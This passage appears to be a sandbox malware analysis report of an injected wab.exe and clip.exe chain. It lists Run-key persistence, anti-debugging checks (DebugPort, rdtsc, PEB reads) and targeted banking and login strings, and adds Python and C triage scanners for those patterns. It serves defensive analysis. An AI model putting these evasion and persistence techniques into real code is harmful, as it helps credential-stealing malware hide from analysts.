          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04151C3F pushad ; iretd 6_2_04151C49
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04151C27 pushad ; iretd 6_2_04151C49
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04151C43 pushad ; iretd 6_2_04151C49
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04151BF9 pushad ; iretd 6_2_04151C49
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06FD1FC8 push eax; mov dword ptr [esp], ecx 6_2_06FD21B4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_08AC3881 push esi; retf 6_2_08AC3882
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_08AC0E2A pushad ; ret 6_2_08AC0E3D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_08AC3478 push A6294078h; ret 6_2_08AC3482
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_08AC0C74 push 3777AA36h; iretd 6_2_08AC0C88
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_08ABF856 push esp; ret 6_2_08ABF858
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_08ABF99D push esp; ret 6_2_08ABF9A4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_08AC2160 push FFFFFFECh; ret 6_2_08AC2162
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_213709AD push ecx; mov dword ptr [esp], ecx 10_2_213709B6
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_02C12160 push FFFFFFECh; ret 10_2_02C12162
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_02C13478 push A6294078h; ret 10_2_02C13482
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_02C13881 push esi; retf 10_2_02C13882
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_02C0F856 push esp; ret 10_2_02C0F858
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_02C0F99D push esp; ret 10_2_02C0F9A4
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_02C10E2A pushad ; ret 10_2_02C10E3D
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_02C10C74 push 3777AA36h; iretd 10_2_02C10C88
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Code function: 13_2_03C9C217 pushfd ; retf 13_2_03C9C235
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Code function: 13_2_03C9C236 pushfd ; retf 13_2_03C9C235
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Code function: 13_2_03C841E3 push es; iretd 13_2_03C841E4
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Code function: 13_2_03C9C1F2 push esi; ret 13_2_03C9C201
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Code function: 13_2_03C80945 push ss; retf 0001h 13_2_03C8094D
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Code function: 13_2_03C7E094 push B72FAC86h; retf 13_2_03C7E09F
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe Code function: 13_2_03C7E0A0 push edi; iretd 13_2_03C7E0A8
Source: C:\Windows\SysWOW64\clip.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FLY4H (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (80 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (90 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\clip.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
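The rows above are a text export of the report's behaviour table: the export glues the Source column onto the behaviour column ("wab.exeCode function:") and appends the "Jump to behavior" link text to each row, and the same event is listed once per process instance, so 170 near-identical NOOPENFILEERRORBOX rows hide the three facts that matter (which processes suppressed error boxes, which process wrote the Run key, and which flagged code functions are anti-analysis tricks). The Python below is an added example for triaging such exports; it is not part of the Joe Sandbox report or its tooling. It parses rows of the shapes shown above, collapses verbatim repeats into counts, extracts the Run-key persistence entry, and tags each "Code function" row by the anti-analysis pattern in its disassembly (PEB read via fs:[30h], rdtsc timing, push/ret control-flow obfuscation). SAMPLE is a constructed excerpt in the same row shapes; the KINDS list and the technique labels are my own, not report fields.

```python
"""Triage helper for flattened Joe Sandbox behaviour rows (added example)."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

# Constructed excerpt in the shape of the rows above, including the glued
# columns and the trailing "Jump to behavior" link text the export leaves behind.
SAMPLE = r"""
Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02C12160 push FFFFFFECh; ret 10_2_02C12162
Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FLY4HJump to behavior
Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FLY4HJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B096E rdtsc 10_2_213B096E
Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21404144 mov eax, dword ptr fs:[00000030h]10_2_21404144
"""

# Behaviour-column labels seen in this report; the Source column ends where one begins.
KINDS = (
    "Code function", "Registry value created or modified",
    "Registry key monitored for changes", "Process information set",
    "Process information queried", "Process queried", "Thread delayed",
    "Thread sleep count", "Thread sleep time", "Window / User API",
    "API coverage", "API/Special instruction interceptor",
    "Binary or memory string", "File opened",
)
ROW_RE = re.compile(
    r"^Source: (?P<source>.+?)(?P<kind>" + "|".join(map(re.escape, KINDS))
    + r"):\s*(?P<detail>.*?)(?:Jump to behavior)?$"
)
# "Code function" detail: start address, disassembly, end address (glued on).
FUNC_RE = re.compile(r"^(?P<start>\d+_\d+_[0-9A-F]+)\s*(?P<asm>.*?)\s*(?P<end>\d+_\d+_[0-9A-F]+)$")
# Technique labels are this example's own; the patterns match the disassembly text.
TECHNIQUES = (
    ("PEB access (fs:[30h])", re.compile(r"fs:\[0*30h\]")),           # PEB read, e.g. BeingDebugged
    ("rdtsc timing", re.compile(r"\brdtsc\b")),                        # execution-timing check
    ("push/ret control-flow obfuscation", re.compile(r"^push\w*\b.*\b(ret|retf|iretd)\b")),
)


@dataclass(frozen=True)
class Row:
    source: str
    kind: str
    detail: str


def parse_rows(text):
    """Split each export row back into (source, behaviour kind, detail), dropping link text."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(Row(m["source"], m["kind"], m["detail"].strip()))
    return rows


def dedupe(rows):
    """Collapse verbatim repeats (one row per process instance) into counts."""
    return Counter(rows)


def _exe(row):
    return row.source.rsplit("\\", 1)[-1]


def run_key_iocs(rows):
    """(process, key, value name) for autostart writes under ...\\CurrentVersion\\Run."""
    out = []
    for row in dict.fromkeys(rows):  # keeps first-seen order, drops repeats
        if row.kind == "Registry value created or modified" and "\\CurrentVersion\\Run" in row.detail:
            key, _, value_name = row.detail.rpartition(" ")
            out.append((_exe(row), key, value_name))
    return out


def code_function_techniques(rows):
    """Technique label -> sorted 'exe:start_address' of the flagged functions."""
    found = defaultdict(set)
    for row in rows:
        m = FUNC_RE.match(row.detail) if row.kind == "Code function" else None
        if not m:
            continue
        for name, pat in TECHNIQUES:
            if pat.search(m["asm"]):
                found[name].add(f"{_exe(row)}:{m['start']}")
    return {k: sorted(v) for k, v in found.items()}


def process_error_mode_flags(rows):
    """Per process, the error-mode flags the report saw (error dialogs suppressed)."""
    flags = defaultdict(set)
    for row in rows:
        if row.kind == "Process information set":
            flags[_exe(row)].update(f.strip() for f in row.detail.split("|"))
    return {k: sorted(v) for k, v in flags.items()}


def summarize(text):
    rows = parse_rows(text)
    return {
        "rows": len(rows),
        "unique_rows": len(dedupe(rows)),
        "run_keys": run_key_iocs(rows),
        "techniques": code_function_techniques(rows),
        "error_modes": process_error_mode_flags(rows),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE), indent=2))
```

Feed the whole exported report to summarize() instead of SAMPLE to get the same three views for the full run: the Run-key value name is the first IOC to sweep for across the estate, and the technique map tells you which of the hundreds of "Code function" rows are worth opening in the disassembler.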

          Malware Analysis System Evasion

Source: C:\Program Files (x86)\Windows Mail\wab.exe | API/Special instruction interceptor: Address: 4293E5D
Source: C:\Windows\SysWOW64\clip.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\clip.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\clip.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\clip.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B096E rdtsc | 10_2_213B096E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5289
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4623
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5690
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4102
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 819
Source: C:\Program Files (x86)\Windows Mail\wab.exe | API coverage: 0.3 %
Source: C:\Windows\SysWOW64\clip.exe | API coverage: 2.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1632 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276 | Thread sleep count: 5690 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204 | Thread sleep count: 4102 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6716 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2452 | Thread sleep count: 819 > 30
Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe TID: 5272 | Thread sleep time: -35000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: cUb5G1h4.14.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: cUb5G1h4.14.dr | Binary or memory string: discord.comVMware20,11696428655f
Source: cUb5G1h4.14.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: cUb5G1h4.14.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: cUb5G1h4.14.dr | Binary or memory string: global block list test formVMware20,11696428655
Source: cUb5G1h4.14.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: powershell.exe, 00000002.00000002.2791766292.000001B1795DB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2607278464.0000000007BEA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2696234625.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2803637542.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2696481148.0000000005846000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: cUb5G1h4.14.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: cUb5G1h4.14.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: cUb5G1h4.14.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: cUb5G1h4.14.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: cUb5G1h4.14.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: cUb5G1h4.14.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: cUb5G1h4.14.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: cUb5G1h4.14.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: cUb5G1h4.14.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: clip.exe, 0000000E.00000002.3034173382.0000000002795000.00000004.00000020.00020000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3287633381.00000000016DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: cUb5G1h4.14.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: cUb5G1h4.14.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: cUb5G1h4.14.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: cUb5G1h4.14.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: cUb5G1h4.14.dr | Binary or memory string: AMC password management pageVMware20,11696428655
Source: cUb5G1h4.14.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: cUb5G1h4.14.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: cUb5G1h4.14.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: cUb5G1h4.14.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: cUb5G1h4.14.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: cUb5G1h4.14.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: cUb5G1h4.14.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: cUb5G1h4.14.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: cUb5G1h4.14.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: cUb5G1h4.14.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: cUb5G1h4.14.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\clip.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\clip.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B096E rdtsc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_03FBD7B8 LdrInitializeThunk
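The rdtsc row above and the long run of fs:[00000030h] reads that follow are byte-pattern signatures. On 32-bit Windows (wab.exe here is the Program Files (x86) build) fs:[30h] holds the pointer to the PEB, whose BeingDebugged byte at offset 2 is what IsDebuggerPresent returns, and a pair of rdtsc reads measures elapsed cycles to spot single-stepping or instrumentation. The scanner below is an added example of how such rows can be reproduced from a code dump; it is not Joe Sandbox's code and not code from the sample. The byte sequence it scans is constructed for the example (a PEB read followed by a BeingDebugged test, then an rdtsc pair), not bytes from wab.exe, and the 0x213B0000 base is an assumed load address. It matches opcode encodings only, without full disassembly, so a hit inside an immediate or inline data is possible. Also note that CRT and loader code reads the PEB routinely, so a PEB read on its own is weak evidence; what makes it meaningful in this report is its co-occurrence with the DebugPort query and the timing check.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 32-bit register names indexed by the ModRM "reg" field. */
static const char *const REG32[8] =
    {"eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"};

typedef struct {
    size_t peb_reads;   /* mov r32, dword ptr fs:[00000030h] */
    size_t rdtsc_count; /* 0F 31 */
} scan_result;

/* If buf encodes a read of fs:[30h] into a 32-bit register, return the
 * instruction length and set *reg_out; otherwise return 0.
 * Two encodings exist: the short "A1 moffs32" form (eax only) and the
 * generic "8B /r" form with a disp32-only ModRM byte (mod=00, rm=101). */
static size_t decode_peb_read(const uint8_t *buf, size_t len, int *reg_out)
{
    static const uint8_t disp30[4] = {0x30, 0x00, 0x00, 0x00};
    if (len < 6 || buf[0] != 0x64)            /* 0x64 = fs segment override */
        return 0;
    if (buf[1] == 0xA1 && memcmp(buf + 2, disp30, 4) == 0) {
        *reg_out = 0;                          /* eax */
        return 6;
    }
    if (len >= 7 && buf[1] == 0x8B && (buf[2] & 0xC7) == 0x05 &&
        memcmp(buf + 3, disp30, 4) == 0) {
        *reg_out = (buf[2] >> 3) & 7;          /* reg field of ModRM */
        return 7;
    }
    return 0;
}

/* Linear byte-pattern scan; prints report-style rows when verbose != 0.
 * Not a disassembler: a pattern inside an immediate or data also matches. */
scan_result scan_code(const uint8_t *code, size_t len, uint32_t base, int verbose)
{
    scan_result r = {0, 0};
    size_t i = 0;
    while (i < len) {
        int reg = 0;
        size_t n = decode_peb_read(code + i, len - i, &reg);
        if (n) {
            r.peb_reads++;
            if (verbose)
                printf("%08X mov %s, dword ptr fs:[00000030h]\n",
                       (unsigned)(base + i), REG32[reg]);
            i += n;
        } else if (len - i >= 2 && code[i] == 0x0F && code[i + 1] == 0x31) {
            r.rdtsc_count++;
            if (verbose)
                printf("%08X rdtsc\n", (unsigned)(base + i));
            i += 2;
        } else {
            i++;
        }
    }
    return r;
}

/* Constructed sample, NOT bytes from the analysed wab.exe image:
 * a BeingDebugged check via the PEB, a second PEB read, and a timing pair. */
static const uint8_t SAMPLE[] = {
    0x64, 0xA1, 0x30, 0x00, 0x00, 0x00,        /* mov eax, dword ptr fs:[30h] */
    0x8A, 0x40, 0x02,                          /* mov al, [eax+2]  ; PEB.BeingDebugged */
    0x84, 0xC0,                                /* test al, al */
    0x75, 0x05,                                /* jnz +5 */
    0x64, 0x8B, 0x0D, 0x30, 0x00, 0x00, 0x00,  /* mov ecx, dword ptr fs:[30h] */
    0x0F, 0x31,                                /* rdtsc */
    0x8B, 0xD8,                                /* mov ebx, eax */
    0x0F, 0x31,                                /* rdtsc */
    0x2B, 0xC3,                                /* sub eax, ebx */
    0xC3                                       /* ret */
};

/* Scans the constructed sample at an assumed base address. */
scan_result scan_sample(void)
{
    return scan_code(SAMPLE, sizeof SAMPLE, 0x213B0000u, 0);
}

int main(void)
{
    scan_result r = scan_code(SAMPLE, sizeof SAMPLE, 0x213B0000u, 1);
    printf("PEB reads: %zu, rdtsc: %zu\n", r.peb_reads, r.rdtsc_count);
    return 0;
}
```

Run it against a raw dump of the region the report names (the 0x2136xxxx to 0x2144xxxx range of process 10) and the verbose rows line up with the report's "Code function" column; a scan that reports rdtsc and PEB reads on a pristine copy of wab.exe is the quick way to confirm that these rows belong to the injected code rather than to the host binary.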
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21404144 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21404144 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21404144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21404144 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21404144 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21408158 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A0124 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21430115 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2141A118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2141A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2141A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2141A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21376154 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21376154 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214361C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214361C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F019F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F019F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F019F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F019F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214461E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B0185 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21414180 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21414180 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A01F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2142C188 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2142C188 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213EE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213EE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213EE1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213EE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213EE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F4000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21372050 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F6050 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21406030 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137208A mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B20F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213780E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F60E0 mov eax, dword ptr fs:[00000030h]
